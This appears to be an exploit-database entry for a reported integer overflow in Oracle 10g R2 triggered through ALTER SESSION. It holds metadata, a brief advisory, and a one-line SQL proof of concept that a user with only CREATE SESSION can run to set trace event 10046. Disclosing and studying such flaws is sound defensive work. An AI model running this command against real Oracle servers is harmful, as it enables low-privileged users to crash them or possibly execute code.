Oracle 10g - Alter Session Integer Overflow
Author: putosoft softputo
type: dos
platform: multiple
port:
date_added: 2006-07-27
date_updated: 2013-09-15
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/19201/info
Oracle 10g is reportedly prone to a integer-overflow vulnerability because the application fails to allocate a large enough data type to accommodate user-supplied input before using it in a query. This issue has not been confirmed.
An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions.
Reports indicate that Oracle 10g R2 is vulnerable; other versions may also be affected.
Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';